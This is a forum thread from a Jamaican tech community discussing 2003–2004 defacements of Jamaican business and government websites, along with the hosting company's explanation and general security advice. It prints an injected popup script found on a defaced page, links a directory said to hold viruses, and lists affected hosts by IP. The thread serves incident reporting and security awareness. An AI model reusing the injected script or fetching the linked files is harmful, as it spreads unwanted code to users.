I was just informed by sandor that the www.jarealty.com (207.21.234.149) website has been hacked. He also pointed out that the JCS' old website (207.21.234.152) has also been hacked. The hacked sites have the same page with the heading "Command Tribulation - Hacking for Jesus - Ownz with Style". Subsequent checks by me also revealed that www.jamaicaobserver.com (207.21.234.171) was similarly hacked with the same page.

Ok, the list continues ...
www.orcjamaica.com (207.21.234.228) - Office of the Registrar of companies
www.pioj.gov.jm (207.21.234.162) - Planning Institute of Jamaica
www.ugli.com (207.21.234.168)
www.tpdco.org (207.21.234.167) - Tourism Product Development Company
www.jis.gov.jm (207.21.234.181) - Jamaica Information Service
www.infochange.com (207.21.234.129) - Info Exchange (Web Developers)
www.amchamjamaica.org (207.21.234.133) - American Chamber of Commerce
www.jcc.org.jm (207.21.234.151) - Jamaica Chamber of Commerce
www.aaj.com.jm (207.21.234.131) - Airports Authority of Jamaica
www.bigga.com (207.21.234.135) - Bigga soft drinks
www.manley-airport.com.jm (207.21.234.157) - Manley Airport
www.ugigroup.com (207.21.234.176) - UGI group of companies
www.moore.com.jm (207.21.234.174) - Moore business forms
www.cariboutpost.com (207.21.234.138)
www.hawkeye.com.jm (207.21.234.145) - Hawkeye security
www.jamaicancoffee.gov.jm


Based on my knowledge of some of the sites, the common factor is that they were developed, and probably hosted, by Info Exchange Ltd. ???

By the time many of you read this the sites will have been fixed, so here's a screen shot of the page ... http://www.techjamaica.com/images/hacked_page.jpg

madness this!
looks like they opened one door and it lead to many many rooms.
a couple years ago a PNP-related site (i believe it was the pnpyo) was hacked too ... i might have the screenshot saved somewhere, but i have to check.

Just like how the World Trade Centre bombings gave Islam a bad name, these (portuguese) morons are out to do the same for Christianity. I guess this is where people who've always detested the faith will detest it even more. The portuguese translation reads:

Many times I try to understand the cause of this much suffering, but for what? The hunger exists, the death - then I remember that [we] are the main causes of this. God, when he created the world, made it wonderful, but man in his ignorance, proved one more time, that we always act on our instincts. When we want something, we forget the rules that God has written [for us], and for this we pay one high price.

Our mission is to nail the word of God to all [places], [even] to proclaim that Jesus died in our place, so that we can be able to possess eternal life, without suffering or sorrow. We believe in the Holy Trinity, and believe in the Salvation [of souls].

...Forever, we [shall] suffer for what we are!!!

The hackers are Brazilian extremists. It's evident in the distinct latin american dialect of portuguese they are using (kinda like a heavily broken or patois Spanish). The portuguese is so badly broken, it was like trying to translate Westmoreland patois into english...

...but these folks are not only targeting Jamaican sites. Their activities have been most rampant in Trinidad & Tobago where they have been attacking websites dealing with Carnival or other adult oriented matter. But these hackers are mindless uneducated zealots. They can't even speak proper Portuguese. >:(

I did some checking. Apparently they merely changed the DNS routers for the hacked sites to point to a different host address showing that webpage. I could be wrong...but each hacked site seemed to turn up the same host address. Maybe this is a spoof as well.

...but they're not very smart. They've given away their location. That IRC channel (server: irc.brasnet.org channel: #Commandt) should be pretty easy to spoof and lock down. These have to be some of the dumbest hackers I've seen yet.

I'm not sure whether to feel insulted they put Jesus' name on this trash or to laugh at their idiocy. I'm too disguested to even react... >:(

Awwww nawwwww!!!! :-X :-X :( >:( >:(

Heck... that kindof stuff leaves a bitter taste in the mouth...

Really nasty stuff...

I did some checking. Apparently they merely changed the DNS routers for the hacked sites to point to a different host address showing that webpage. I could be wrong...but each hacked site seemed to turn up the same host address. Maybe this is a spoof as well.

...but they're not very smart. They've given away their location. That IRC channel (server: irc.brasnet.org channel: #Commandt) should be pretty easy to spoof and lock down. These have to be some of the dumbest hackers I've seen yet.

I'm not sure whether to feel insulted they put Jesus' name on this trash or to laugh at their idiocy. I'm too disguested to even react... >:(


These guys are Script Kiddies Wesite Defacers!!! Simple They learn one hack scan whole subnets then use the automate script the downloaded to deface ppls website..........

I wouldn't try to go after them just secure the hosts...........I am sure modt of these sites are running IIS and these uys exploited a very old bug...........

What a set of losers........

All of theses sites are on the same host.
So that we don't forget this one, here is a screenshot.

Remember when the chinese hackers RadioJamaica.com?

It wasnt made public but I think go-jamaica.com was hacked about two weeks ago. I went there and it was just pure Garbage. Sorry I did not take a screen-shot. I am in central Europe (7 hours ahead of Jamaica), when I checked the site it was 2 AM in Kingston so it might have been fixed before you guys woke up. If anybody else saw this about two weeks ago please post.

here is their website http://www.proverbiox.hpg.ig.com.br/
it is a directory listing. DO NOT DOWNLOAD ANY OF THE FILES SOME OF THEM ARE VIRUSES

CGPGroup, check the board stats, there is someone awake all the time. ;D

And yeah sorry you didn't get a screenshot.

I hate the fact that our Saviour Jesus name was used in this evil deed.

That what ticks me off the most.

Manley airport yet to be fixed

The sites seemed to be fixed now.
Radio stations carried it on the news this morning.

Reports on FAME news this morning states that jamaicaobserver.com's hack wasn't a simple DNS redirection, but rather a full fledged hack. They actually uploaded a set of files to their server and replaced the actual pages.

I must be living somewhere else, i haven heard anything at all, other than what i have seen here. Thats bad :( :(

I heard that they were hacked through the Frontpage extensions on the website, more M$ flaws.

Reports on FAME news this morning states that jamaicaobserver.com's hack wasn't a simple DNS redirection, but rather a full fledged hack. They actually uploaded a set of files to their server and replaced the actual pages.

But we all know that it wasn't a DNS redirection. The hackers apparently used a Frontpage extension vulnerability allowing them to gain access and run free on the server. They replaced the index files for the websites mentioned.

wow is this a first for Jamaican websites, i mean the scale of the attacks?

wow is this a first for Jamaican websites, i mean the scale of the attacks?

definitely a first in terms of the scale. but i guess there are not many instances of numerous jamaican web sites being hosted on the same server .. hence many felled with one blow.

i think rjr, go-jamaica, the pnp (still to find the screenshot) have all been hacked in the past (sometimes more than once).

Let's hope that something positive can come out of this. Jamaican websites getting hacked is nothing new...been happen long time. However because this incident has gotten some more publicity, maybe more companies will start to take Information Security more seriously and do what they need to do to keep their webistes, and internal systems, safe.

Website defacement is bad, but at least it let's you know that something bad has happened. What about the hacks that you don't easily see? How many websites are out there with your personal information on insecure servers?

How do we know that when a company goes "on line" they are really ready to handle the challenges that await them where security is concerned?

What recourse does the average joe have if his personal info is compromised when a website is hacked?

Let's hope that discussions coming from this incident can help to answer some of these questions and help us move forward.

I think these youths are reading too much hacking magazines.

Good work guys (Chris and Sandor). Hope Chris will do a follow up on this- What the guys at infoExchange have to say about this and what steps they are taking to prevent a future occurrence, even if they have nothing to say we want to know.
Looking forward to that.

Good work guys (Chris and Sandor). Hope Chris will do a follow up on this- What the guys at infoExchange have to say about this and what steps they are taking to prevent a future occurrence, even if they have nothing to say we want to know.
Looking forward to that.

Thanks DA.

I'll contact them and give them the opportunity to respond.

Hey Chris, call me an opportunist, but do you see a major advertisement opportunity for TechJ in this? Or am I spending too much time looking at multiplicities of possibilities with everything? ;D



I think these youths are reading too much hacking magazines.


- Ropy, you seem jealous that they know more than you do ;D

Our investigations at Info Exchange led to an unauthorized user from the Brazilian region of RIO Grande DU SUL in the city of Porto Alegre. We have secured all the evidence and have forwarded such to the relevant authorities for further investigation.

I want to thank you guys for the work you do at techjamaica especially Chris and Black Crypto even though my team was on top of the issue within a few minutes. My team was also instructed to secure the web servers first and then to secure the evidence.

Our clients, some immediately, were back in full force by 8 a.m. this morning when we decided that everything was cool.

As we all know, security is not a point in time solution but exists on a continuum and we at Info Exchange recognize and acknowledge that fact.

Thanks again

Our investigations at Info Exchange led to an unauthorized user from the Brazilian region of RIO Grande DU SUL in the city of Porto Alegre. We have secured all the evidence and have forwarded such to the relevant authorities for further investigation.

good luck with that .. hope its not like a couple of years ago when i was using cwjamaica dialup and another cwjamaica dialup customer tried to drop a trojan on my computer. i gave cwjamaica tech support the exact time and the ip address of the attack. dunno why i thought cwjamaica would be able to use those two bits of evidence to link it back to a particular username .... anyhow, they kindly informed me that they couldn't. wonder if this is still the case

What security hole made your host vulnerable to this hack?

What security hole made your host vulnerable to this hack?


It was a weak password setting on one of our client maintained sites. Our servers are always being probed by hackers looking for a security hole and we have been able to ward them off so far until last night. Based on a client request, it was the only site with front page extensions and it also had a weak password setting.

All our other sites evidently have very strong passwords except for this one with Front page extensions attached to it. I can categorically state that it was not a O/S vulnerability exploit and our other security measures including patches thwarted the attacker from planting any trojan horses on our servers. We suffered web site defacement and that was the extent of his/her exploit.

Uwill, good to hear things are back under control.

What's the general attitude toward IT security among the organizations you've interacted with? What do you think can be done to make improvements in that area?

Hi uwill, thanks for coming on and explaining it to us. We all know, especially me, what these idlers can cause and cost.

All the best in recovering and holding the culprits accountable. We hope to see MORE of you around other than posting about this issue ;)

Uwill, good to hear things are back under control.

What's the general attitude toward IT security among the organizations you've interacted with? What do you think can be done to make improvements in that area?


Information security is still in its infancy in Jamaica and to a larger extent the Caribbean. We still think of security as related to the guard at the gate and checking the trunk of the car. We still do not have much regard for the diskette with confidential company info in the top pocket and that is a sad case of affairs. Over 70% of etheft is internal and not external and most companies even though focused on external intrusions install and leave their firewall to maintain itself.

Security is still considered as a point in time solution and you will find companies that do not have active security policies and measures in place state that they are secured. It has been slow in getting to the board level but I think we as technical people need to practice security as well as a continuous exercise rather than fooling the business side into thinking we are secure since we have a firewall!!!!

How many technical gurus can profess that they really understand security and its techniques. The majority of us are not trained or equipped to deal with an all out attack. Such expertise takes considerable reading, training and practice to even scratch the surface.

How many networks are really safe? A few I would guess (DHCP has become such a bad thing!!!) What about patch management, access controls, encryption, secure coding techniques and audit trails? Security is hard work and requires and deserves the attention of all technocrats and business people. Info Exchange has always been vocal on the topic and we continuously educate our clients on this topical issue.

You can never stop an attack on your information assets but you must always be prepared for the eventuality!!! :)

It was a weak password setting on one of our client maintained sites. Our servers are always being probed by hackers looking for a security hole and we have been able to ward them off so far until last night. Based on a client request, it was the only site with front page extensions and it also had a weak password setting.

All our other sites evidently have very strong passwords except for this one with Front page extensions attached to it. I can categorically state that it was not a O/S vulnerability exploit and our other security measures including patches thwarted the attacker from planting any trojan horses on our servers. We suffered web site defacement and that was the extent of his/her exploit.


So you are saying one host with a weak password allowed the attackers to compromise several other sites??.....Hmmmm.......Should that account have only allowed the attackers to access only the the account with weak password??

Tech_Guru,
I wouldn't ponder that too hard

hack away!!! hack away!!!
you know ... it could be some jamaican guys who spoofed their intrusion. Ever thought of that?

So you are saying one host with a weak password allowed the attackers to compromise several other sites??.....Hmmmm.......Should that account have only allowed the attackers to access only the the account with weak password??


On IIS, most sites run under the I_USR anonymous account that has limited permissions for Internet user access. Once scripting is enabled, vbscript or jscript (ASP), then an unauthorized user can run malicious scripts once planted from the browser window to perform attacks on the Internet services as was seen in this case.

Most data intensive and high end web sites do allow access to scripting objects (COM objects) and in our case a lot of our web sites use high end functionality, leaving the possibility of misuse. As seen in our case though, the attacker was able to deface some of our web sites through scripting but did not materially affect our ability to respond.

Thanks

Uwill, do you see this event affecting your company's web hosting integrity?

How do you plan to counter future attacks on yourself, meaning your company and your clients which you host?

Also will there be any follow up to have the person(s) held accountable, or will it just be passed off as just another hack?

Are there plans to go Linux?

http://neowin.net/images/news/logos/linux.gifhttp://neowin.net/images/news/logos/linux.gifhttp://neowin.net/images/news/logos/linux.gifhttp://neowin.net/images/news/logos/linux.gifhttp://neowin.net/images/news/logos/linux.gifhttp://neowin.net/images/news/logos/linux.gifhttp://neowin.net/images/news/logos/linux.gifhttp://neowin.net/images/news/logos/linux.gifhttp://neowin.net/images/news/logos/linux.gifhttp://neowin.net/images/news/logos/linux.gifhttp://neowin.net/images/news/logos/linux.gifhttp://neowin.net/images/news/logos/linux.gif

author=igodit link=board=27;threadid=1984;start=30#msg19780 date=1065481458]
Uwill, do you see this event affecting your company's web hosting integrity?

How do you plan to counter future attacks on yourself, meaning your company and your clients which you host?

Also will there be any follow up to have the person(s) held accountable, or will it just be passed off as just another hack?

Are there plans to go Linux?



Quite to the contrary, Info Exchange has received accolades from the business and the tech communities alike. Our web hosting integrity is still intact as we are stilll regarded as leaders in our industry. CNN, Department of Defense, Yahoo and other other more prominent sites have been the center of attacks and defacements and since those attacks are inevitable, it has been the way they respond to such incidences that have made them remain on top.

Future attacks will be countered by reducing the surface area for attacks to a minimum, client education and increased vigilance. There will be strong followup as far as we can take it through local and international authorities. The ISP in brazil has already been contacted to supply further information on the culprit.

At Info Exchange, we are always looking for the next best thing and Linux has always been on our radar but moving to Linux has not been contemplated at this time.

The Observer posted an article about the incident today:
http://www.jamaicaobserver.com/news/html/20031007T010000-0500_49985_OBS_HACKING_OF_OBSERVER_WEBSITE_TRACED_ TO_BRAZIL.asp

It makes mention of a Cybercrime Unit of the local Police. I never knew they had such a unit. Does anyone know anymore about it? How many people are attached to it and what kindof training they've had?

interesting fi real .. didnt know there was a cyber crime unit. funny we get a cyber crime unit before we even have cyber crime laws .. hmmmm

i'm a bit disappointed though in both the observer article above and the radio jamaica news item (http://www.radiojamaica.com/news/?id=5454) yesterday because both kinda mix up the facts. they almost make it seem as though the hacks were all 'independent' when really, one was a backdoor basically to all and they're all connected like that.

like this taken from the observer article "At the same time, David Allen, CEO of Info Exchange Ltd, also reported yesterday that its website was hacked Sunday night, and also traced the hacking to a provider in Brazil." .. makes it kinda seem like "ohhh yeah, we got hacked too"

uhmmmm .. i think i was hacked .. that last post look like it gone beserk

ahmmmm ... am i the only one seeing this? it wasn't me

I see it too...
Dunno what's going on...

Fixed it. Something was wrong with a previous post.

Interesting indeed ;)
;D

Yes guys there is a Jamaican cybercrime unit, the unit is a part of the new crime fighting "squad", i can't remember the name of the squad but it was setup about a month ago. Do you guys remember that fraud case involving Xoom.com (discribed by some Media house as Jamaica's first case of a cyber crime) in September? well the Cyber Crime Unit i think was one of the groups involved in gettin the women allegedly involved in the crime.
I would love to know more about this unit - I'm wondering if they have the expertise and equipment to deal with the task involved.
I have suggested to Chris that he do some research on them and let the community know of the findings.


Btw Techjamaica.com got mentioned in that observer article - now isn't that nice. :)

Take a look at http://www.zone-h.org/en/defacements/view/id=493445/

Take a look at http://www.zone-h.org/en/defacements/view/id=493445/


Thanks Guru...I was trying to remember the name of that site.
I did a search for "jamaica" on it and this is what I found:

http://www.zone-h.org/en/search/what=jamaica/

A list of Jamaican websites that have been defaced. :-\

Thanks Guru...I was trying to remember the name of that site.
I did a search for "jamaica" on it and this is what I found:

http://www.zone-h.org/en/search/what=jamaica/

A list of Jamaican websites that have been defaced. :-\


Searched for ".jm" and got this http://www.zone-h.org/en/search/what=.jm/

I only heard of this Cyber Crime Unit when the incident with Xoom.com occured. But I hear that they had assistance from the US feds.

So about our own local independence I'm not so sure we even on par with the rest of the world on cyber security, though a lot of us know how to break it, most of us are just "script kiddies" too.

And to be honest that Cyber Crime unit seems like dem working with the TAT (Try A Ting) policy.

Just read the Jamaica Observer's article on the hack.

"OBSERVER technicians yesterday traced the hacking of the newspaper's website Sunday night to an Internet address in Brazil and have asked the service provider to help in tracking down the users who attempted to launch a virus onto the company's computer system."

Do IT people truly refer to themselves as a Technician anymore, let me feel like I fix fridge and AC units.

Like the little kudos we getting for our security focus.

But honestly now, does it even make sense to go after a website defacer, then again as we all notice alot of police on the road, which is a good thing. So maybe the Cyber Crime people need something to do too. Mabe they should start posting pictures of them on some Jamaican websites to intimidate some hackers ;D

---
Like yesterday I saw one of the policemen directing traffic in from of UWI Hospital gate. If some of you know how that road is situated and to see him do that, you would probably want to run him over for stupidity.

Thanks Guru...I was trying to remember the name of that site.
I did a search for "jamaica" on it and this is what I found:

http://www.zone-h.org/en/search/what=jamaica/

A list of Jamaican websites that have been defaced. :-\


I was looking checking for www.alladas.de -- site is dead now however :( :(

They gave good reporting i.e the type of attack and allowed you to check if the site is still vulnerable.....Plus thier list was more comphrensive!!

Here are my questions...

Was the box hosting the sites hacked or did someone breach the DNS server and redirect the traffic to another I.P. address?

Let us assume the web server was hacked...

What kind of forensic work has been done to make sure that the hackers didn't leave any
sniffers (to get passwords)
trojans
back doors
virus code

on the servers?

Recently, jabber.org was hacked and the administrators locked down the site for a few weeks while they did a complete forensic analysis of the site and the downloadable code.

Did the site administrators restore the site from a clean backup or did they just continue as usual?

If all the machines are on the same host, can one site's directories be infected with a trojan, sniffer or whatever that affects the sites of all the others?

Just asking... I don't have the answers. Just trying to figure out what I would have done in that situation. Any way you look at it, it is not pretty.

Jamrock - as was mentioned numerous times in previous posts to this thread, it wasn't a DNS redirection. The webserver was hacked, and the main page overwritten with an uploaded defacement. I actually posed this very same question at the beginning of the thread.

Jamrock - as was mentioned numerous times in previous posts to this thread, it wasn't a DNS redirection. The webserver was hacked, and the main page overwritten with an uploaded defacement. I actually posed this very same question at the beginning of the thread.

I have asked for a reason. I heard from other sources that it was a DNS redirection.

...I have suggested to Chris that he do some research on them and let the community know of the findings.

Yes DA, I'm working on it ;)


Btw Techjamaica.com got mentioned in that observer article - now isn't that nice. :)

Nice indeed! ;D

Just letting you guys know that I'll be in a radio interview on KLAS FM's morning show (First Edition) tomorrow, Thursday, at 6:15am. Also of interest to some of you is that a representative from the Cyber Crime Unit will also be on. The topic will be hacking and I've already made it clear that I will not discuss any details about the recent defacements.

sets his alarm clock to 6 am.

But why so early though? Is that when most persons will be stuck in traffic and listening to thier radio's?

Will be instresting to know more about the CCU.

Posted by: Chris Posted on: Yesterday at 05:58:05pm Just letting you guys know that I'll be in a radio interview on KLAS FM's morning show (First Edition) tomorrow, Thursday, at 6:15am. Also of interest to some of you is that a representative from the Cyber Crime Unit will also be on. The topic will be hacking and I've already made it clear that I will not discuss any details about the recent defacements.

Chris represented well on KLAS FM89 this morning.
Well done man 8) 8) 8)

Chris represented well on KLAS FM89 this morning.
Well done man 8) 8) 8)

It's 9:20 am and i'm just reading this portion of the thread, which mean i am just finding out about the interview and have missed it completely. I suggest that Chris create a new thread next time around.
Good to know however that he "represented well". 8)

audio upload? all now we overseas still can't see that smile jamaica video

is anyone else seeing this .... go to http://www.jamaicaobserver.com
do you get a popup for a brazilian site?

i have a feeling whatever hacking was done, some remnants of something still exists .. maybe a trojan, script or something .. hence the weird popup for that brazilian site that i am getting everytime i refresh the jamaicaobserver.com

actually .. i am not getting it any more .. .but i have a feeling there is some cookied/time-delay thing still going on with those sites that were hacked.

Duuuuuuuude, I'm getting it too. Wiiiiiierd.

You knowwhat I'm thinking right now? I think a lot of persons have put their foot in their respective mouths.

How can this popup remain if there was the quick and effective response that I heard about on the radio and this board?

Yummm...leather...

what's this code doing ...


<script language="JavaScript"><!--
function popwin(url,width,height) {
if ((width==null)||(width=='')) {
width=300;
}
if ((height==null)||(height=='')) {
height=300;
}
var newwin = window.open(url,'new_win','width='+width+',height= '+height+',toolbars=no,scrollbars=yes,status=no,re sizable=yes');
}
function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);

var IE4 = document.all;
var NS4 = document.layers;

function enter_key_trap( e ) {
var keyPressed;
if (window.event.srcElement.name!='stext')
return;
if ( NS4 )
keyPressed = String.fromCharCode( e.which );
else if ( IE4 )
keyPressed = String.fromCharCode( window.event.keyCode );

if ( keyPressed == "\r" || keyPressed == "\n" ) {
document.forms['searchform'].submit();
}
}

// Setup the enter keytrap code
if (window.document.captureEvents != null) {
window.document.captureEvents(Event.KEYPRESS);
window.document.onkeypress = enter_key_trap;
}

//--></script>

Screenshot. Just in case it's removed before everyone gets a peek.

I didn't see it at all. Is it evident with any of the other sites that were defaced?

what's this code doing ...


That code doens't look too malicious, but I'm no programmer, I only play one on TV.

TechJamaica.com - Covering hacks as they happen.


Upon subsequent reloading of the website I stopped getting the popup also.

I compared the page source of the page that has the popoup with the code from the site without it and found the offending code:



<script language="JavaScript">
var width = 800;
var height = 600;

var left = 99;
var top = 99;

URL = "http://www.minhabusca.com.br";

window.open(URL);
</script>



It starts on line 96.

This proves that depending on your timing, you will view one of two (or more) different web pages; one which loads a popup and one which does not.

The question now is as asked by sandor:

is there some "cookied/time-delay thing" still going on with those sites that were hacked?

Rather Intersting Developments!!!

Sits back and wait for the Latest News!!!

sandor.. .that looks like a bunch o Dreamweaver inserted code for three Javascript events... one is setting up a new window... one is setting the timeline for a perpetual reload... that last one is kinda tricky tho.. and I'd have to take a guess at it being some kind of key binding...binding the letter "e" ... try pressing e on the page and seeing what happens ;D

Anyone contacted the webmaster for the site? Just in case they don't know about it. Not the dreamweaver code, but the popup.

Anyone contacted the webmaster for the site? Just in case they don't know about it. Not the dreamweaver code, but the popup.


They were contacted earlier in the day and were working on the situation.

what's this code doing ...


<script language="JavaScript"><!--
function popwin(url,width,height) {
if ((width==null)||(width=='')) {
width=300;
}
if ((height==null)||(height=='')) {
height=300;
}
var newwin = window.open(url,'new_win','width='+width+',height= '+height+',toolbars=no,scrollbars=yes,status=no,re sizable=yes');
}
function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);

var IE4 = document.all;
var NS4 = document.layers;

function enter_key_trap( e ) {
var keyPressed;
if (window.event.srcElement.name!='stext')
return;
if ( NS4 )
keyPressed = String.fromCharCode( e.which );
else if ( IE4 )
keyPressed = String.fromCharCode( window.event.keyCode );

if ( keyPressed == "\r" || keyPressed == "\n" ) {
document.forms['searchform'].submit();
}
}

// Setup the enter keytrap code
if (window.document.captureEvents != null) {
window.document.captureEvents(Event.KEYPRESS);
window.document.onkeypress = enter_key_trap;
}

//--></script>


The first javascript function is a custom popup window function that takes a url and height and width ... the second javascript function correct a Netsacpe 4 bug when you resize the browser window and the third function checks to see if the "enter" key was pressed in the search box and submits the search automatically.

These scripts are perfectly harmless!

Question is, was it on the Jamaica Observer website?

How did it get there?

Was it a hack?

Has anyone heard any updates on the progress of the investigations?

I searched for "Jamaica" on http://www.zone-h.org and found that there have been more Jamaican websites that have been recently hacked and defaced. (November 21, 2003) :(

These defacements were done by a group called the XFree Team. Apparently it was a mass defacement as with the case of the Brazillian hackers in October. The following websites were victims:

11/21/2003: http://www.lifepathjamaica.com
11/21/2003: http://www.rotaryjamaica.org
11/21/2003: http://www.galaxyjamaica.com
11/21/2003: http://galaxyjamaica.com

A search for the .jm domain showed that the following websites were also victims of the same defacement incident:
(see http://www.zone-h.org/en/search/what=.jm/ )

11/21/2003: http://psj.org.jm
11/21/2003: http://porterbrothers.com.jm
11/21/2003: http://ncda.org.jm
11/21/2003: http://ild.org.jm
11/21/2003: http://abs.com.jm

These sites were all hosted on the same server - which was running Apache on Linux.

Jamaican webmasters/hosting providers - ensure that you have taken steps to secure your websites and the websites of your clients.

Jamaican companies - make sure that your website hosting provider is serious about security, and make sure that you are too ;)

Servers running linux???? Do my eyes trick me?? :o :o ::) ::)

Servers running linux???? Do my eyes trick me?? :o :o ::) ::)


They trick you not Mitchie. It just goes to show that vulnerabilities and exploits are serious problems for many platforms and applications.

Servers running linux???? Do my eyes trick me??

If one does not properly secure a Linux server, it can be hacked as easily as a Windows server. Even properly secured Linux servers can be hacked when new exploits are discovered.

The only way to fully secure any server is to plug out the cable and turn it off. ;D

My reading suggests some important steps.

secure the server to make it difficult for someone to hack it.
secure the machines that access the server.
Put in intrusion detection software so you can know if someone hacks the box.
Implement good backup and data recovery procedures so that you can restore a clean copy of your server if it gets hacked.
Check your logs daily for signs of intrusion

Securing a server is like securing a car. Someone will break in if he/she has the time, skill and patience. You can make it so difficult, however, that the attacker chooses an easier victim.

By the way, I was reading a book where they recommended putting intrusion detection software before the firewall and behind the firewall.

The IDS before the firewall tells you the types of attacks that are being formulated against your network. The firewall behind the firewall tells you the attacks that have been successful.

The first firewall gives you advance notice and allows you to adjust your firewall settings as you see new types of attacks taking place.

Interesting concept...

<!--Start shameless plug>

Good thing http://www.souvenirworldja.com/ not on that list!

<!--End shameless plug>

<!--Start shameless plug>

Good thing http://www.souvenirworldja.com/ not on that list!

<!--End shameless plug>


Be careful about shameless plugs. That one looked like a challenge Ramesh ;)

Nh! No one on this website going attack my almost useless shamelessly plugged website, right? Right? Right??!? :o

Nh! No one on this website going attack my almost useless shamelessly plugged website, right? Right? Right??!? :o


Yeah ... riiiiight 8)

it look fat and ready for a good pluckin nuh true!..... ;D

it look fat and ready for a good pluckin nuh true!..... ;D


Who going do it, you? ;D ;) :o ::)

(Gulp)

Time has passed, and more Jamaican websites have been hacked and defaced. One of the latest happening on February 21, 2004 when http://www.minilab.gov.jm was defaced.

See the archive of the defacement at http://www.zone-h.org/defacements/mirror/id=962212/

Time has passed, and more Jamaican websites have been hacked and defaced. One of the latest happening on February 21, 2004 when http://www.minilab.gov.jm was defaced.

See the archive of the defacement at http://www.zone-h.org/defacements/mirror/id=962212/


I'm dissappointed. The site http://www.minilab.gov.jm has been hacked since at least Feb 21, 2004 and it still is not fixed. It's a Jamaica government site(the Ministry of Labour), and it's not fixed yet. Shame on you government. :-\

Just checked and the site seems to be down. Looks like they're "working on it"?

Just checked and the site seems to be down. Looks like they're "working on it"?



Nopes. http://www.minlab.gov.jm gives the following in plain text:

"amarelo was here ! r00t_system defacers crew 2004 ! irc.brasnet.org /j #ry ! sur00t@america.hm ! fuc"

Just checked again and this time it's displaying the hacked message. Last night it wasn't coming up at all so probably the "new" website administartors were doing some site maintenance last night ;D Talk about e-squatting ;D

In light of the recent focus on Cybercrime and Information Security, this incident looks really embarrasing for the government. Shame shame shame :-\ :-\ :-X :-X :-X :(

It appears that the Ministry is no longer using that url but is now using http://www.lmis-ele.org.jm/. This is probably why it has been left in the cracked state for so long. Probably they should tell http://www.mfaft.gov.jm/Links/links.htm to point to the new URL ???

Jampro also links to it at http://www.investjamaica.com/links/index.php

i'm not advocating that idiots be allowed a slap before intervention as this is a bit harsh but without a doubt, those who dont hear and think they are immune, will feel.
this does encourage them to then put in place a proper secure structure. afterall, the main proponents and architects of the net (namely the americans) also had to learn the lesson this way too.

it may yet teach them to have value for their IT staff who do work hard and with limited resources do the best they can.
incidents like this serves to support the need for proper investment and training.

Bwoy deakie, the problem I have is that until they figure things out, they are likely compromise citizens sensitive data. That's not a nice thing at all. For a govt. that talks about E-government and E-business, it just looks plain bad.

Nobody from the ministry looks at their own website to even see what happened?

Disgrace beyond words :-\ :( >:(

Is this another attack on some of the sites that were defaced last year? http://www.techjamaica.com/tech_forum/index.php?board=27;action=display;threadid=3592

Looks like the other Ministry of Labour website is having problems: http://www.lmis-ele.org.jm

CVM TV news on Sunday night carried the story of the hacking of the Ministry of Labour and Social Security Website:
http://www.cvmtv.com/news/archives/newswatch/archive_Sunday,%20April%2011%202004.html

In the news report the officials at the Ministry claim that the defaced website has been deactivated.Yet it is still online with the defacement. ??? ::) :-\

Methinks some people need a clue.

It's especially embarrasing since the Ministry has "Security" in it's title. :-X

The report also says that the defacement took place about a week before. That's not what http://www.zone-h.org has to say about it. According to them, it's been defaced since at least February 21, 2004. :-X

UWI Websites have been hacked and defaced.

http://wwwcardin.uwimona.edu.jm/
http://vhljamaica.uwimona.edu.jm/

It appears to be a mass defacement.

Zone-h.org has archived these defacements at
http://www.zone-h.org/en/defacements/view/id=1157326/ (http://www.zone-h.org/en/defacements/view/id=1157326)
http://www.zone-h.org/en/defacements/view/id=1157325/

:-\

Here's the screen capture

http://gallery.cybertarp.com/albums/userpics/21504/UWI%20hacked%20page.gif

The UWI online student registration sysem at
http://srs.uwimona.edu.jm:1104/student.htm is now down...
Could it have been hacked too? ??? :-\

I believe from time to time, UWI pulls this page to do some info updates.

I wouldnt assume that the page was hacked...at least not right away

I realize that I may have a problem getting to the student registration page from behind my firewall since it runs on port 1104 and access to that port isn't allowed.

However, this morning I tried to get in from home and got back error messages.

The two sites are now down, guess they've now realised what's happening.

Why are these guys targeting Jamaican websites?

Strangely, the links to Zone-H.org show different pictures of the defaced website than what we saw this morning up to the time the sites were pulled offline. It could be that the defacers changed their posting after Zone-H.org archived it.

I was beginning to wonder about that.

Why do you think that these sites are now being so targeted?

Is it that the number of persons exploiting websites have increased in this region? Could it be that proper security measures have not been put into play by this region and are now being targeted for this reason?

As I saw one group say "hacking for jesus". I see where these had used holes in IIS etc...?

Can we some how educate or suggest security measures that can be put in place by these companies the protect our local entity? This would sure boost the interactivity of Techjamaica and the Jamaica IT community.

......but then again it could be interpreted as being presumptionous and overstepping our boundaries. What say you?

Why do you think that these sites are now being so targeted?

Is it that the number of persons exploiting websites have increased in this region? Could it be that proper security measures have not been put into play by this region and are now being targeted for this reason?



Nas, most website defacers and other security breachers are opportunists. They pick on targets more likely to yield good results. They scan blocks of IP addresses looking for vulnerable machines to exploit. I strongly doubt that these defacers responsible for the recent incidents with Jamaican websites were specifically looking for Jamaican websites. They just happened to find some vulnerable boxes ripe and ready for the picking. So pick them they did.

Definitely, there was an absence of security measures on the defaced websites that would have prevented the incidents from occurring. It's also possible that if word gets out that this region is lax when it comes to Internet website security, then people will see it as "low hanging fruit" and exploit the weaknesses.


Can we some how educate or suggest security measures that can be put in place by these companies the protect our local entity? This would sure boost the interactivity of Techjamaica and the Jamaica IT community.

I thought that's what we've been doing all along ;)

Actually, you have a point. I'll take it a step further to say that there should be legislation which compels Jamaican organizations to adhere to defined standards for data protection - especially if they will be placing citizens sensitive data online.

This is the practice in other developed nations where E-Business and E-Government are operational.

The US National Standards body - NIST, has guidlines and standards for IT Security. The Canadians have their govt. agency with their own standards (some adapted from NIST).
The UK has theirs. And these countries all have their legislation to whip organizations into shape!

The US has Graham-Leech-Bliley Act for Financial institutions so they take steps to protect the confidentiality of client data. They have HIPPA Act to protect sensitive healthcare data of patients. They have Sarbannes-Oxley Act to protect the integrity of Financial Statements in companies. The North American Energy Reliability Commission (NERC) has legislation to protect critical Electricity Infrastructure against Cyber attacks.

When are we going to get similar legislation? ???

